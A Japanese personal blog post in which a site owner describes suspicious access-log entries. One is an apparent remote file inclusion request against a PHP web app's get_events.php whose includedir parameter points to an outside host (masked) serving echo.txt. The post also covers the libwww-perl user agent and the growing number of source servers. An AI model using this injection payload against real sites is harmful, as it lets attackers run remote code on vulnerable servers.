メニュー 蕭寥亭 検索

開店休業の記

危険度上昇中?

 また新手です、不審アクセス。手口は違うけどやってるヤツは前回と同じなのかもしれませんが。今回はこんなんです(↓)。

    GET //ws/get_events.php?includedir=http://※※※※/.r/echo.txt? HTTP/1.1

 上記以外にもいくつか別パターンがありますが、リクエスト内容はかなり共通しています。今回も「※※※※」の部分には実在のURLが指定されていました。ユーザーエージェントは libwww-perl/5.** です。これも前回と同じ。** は数字で、バージョンが微妙に異なっているようです。乗っ取ったサーバーの libwww-perl のバージョンがそれぞれ違うからでしょうか?

 どうやら PHP 系の WEB アプリを攻撃しようとしているようです。ウチは対象になっている WEB アプリは使っていないのでとりあえずだいじょうぶですが、だんだんヤバくなっている気がします。というのは前回の perl のヤツは発信元は2ケ所だけで、そこから繰り返しアクセスがあったのですが、今回のは10ヶ所以上からにバラけています。地域もさまざま。同一犯なら乗っ取ったサーバーを増やしているということになります。発信元の中には商用と思しき(海外なので自信はありませんが)ページが表示されるとこもありました。ううむ・・・。